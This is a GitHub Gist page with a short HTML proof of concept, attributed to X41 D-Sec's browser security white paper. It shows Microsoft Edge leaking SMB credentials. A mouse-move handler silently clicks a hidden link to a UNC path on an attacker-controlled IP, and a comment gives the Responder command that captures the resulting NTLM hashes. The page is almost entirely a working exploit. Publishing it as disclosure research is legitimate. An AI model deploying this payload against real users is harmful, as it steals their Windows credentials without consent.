-
-
Save 0x4243/02ac82e9a374a73392c53fcedadb5e2b to your computer and use it in GitHub Desktop.
SMB Credentials leakage by MSEdge as presented in Browser Security White Paper, X41 D-Sec GmbH.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- PoC for leaking SMB Credentials with listening Responder --> | |
<!-- as presented by X41 D-Sec GmbH in Browser Security White Paper. --> | |
<!-- To be used as: $ `responder -I eth0 -w -r f -v` --> | |
<body onmousemove="document.getElementById(6).click()"> | |
<a id=6 href="\\192.168.56.101\edgeleak" download></a> | |
</body> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment